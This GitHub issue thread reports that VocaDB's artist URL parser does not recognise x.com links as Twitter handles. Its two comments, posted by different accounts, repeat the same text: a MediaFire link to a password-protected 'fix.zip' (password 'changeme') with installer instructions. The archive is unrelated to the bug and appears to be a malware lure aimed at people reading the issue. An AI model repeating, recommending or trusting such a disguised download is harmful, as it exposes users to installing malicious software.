### ISSUE TITLE
Add x.com to ArtistExternalUrlParser

### ISSUE THREAD

**Issue by szc126** [VocaDB/vocadb#1805]
### Website (required)
VocaDB

### Describe the bug (required)
x.com is missing from VocaDbModel/Service/Helpers/ArtistExternalUrlParser.cs (or whatever code is responsible for indexing Twitter handles).

### To Reproduce (optional)
1. https://vocadb.net/Search?filter=https%3A%2F%2Fx.com%2Fcfm_miku&searchType=Artist → no results

### Expected behavior (optional)
Same as https://vocadb.net/Search?filter=https%3A%2F%2Ftwitter.com%2Fcfm_miku&searchType=Artist → https://vocadb.net/Ar/1

### Desktop (optional)
 - Browser: [e.g. chrome, safari]

### Smartphone (optional)
 - n/a

### Checklist (required)

Fill out the checklist. Use ~~strikethroughs~~ or leave fields empty if you don't know or are unable to check/test.

- [x] Searched **[VocaDB/vocadb](https://github.com/VocaDB/vocadb/issues)** for duplicate issues.
~~- [ ] Tested on the **[beta site](https://beta.vocadb.net)**.~~ Beta site is not loading
- [ ] Tested on different browsers (e.g. **Firefox**, **Chrome**, **Safari**, **Edge**).
- [ ] Checked in **private mode**.
- [ ] Cleared **browser cache** and **cookies**.
- [ ] Checked the **DevTools console**.
- [ ] Checked the **syslog** (mods+ only).

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
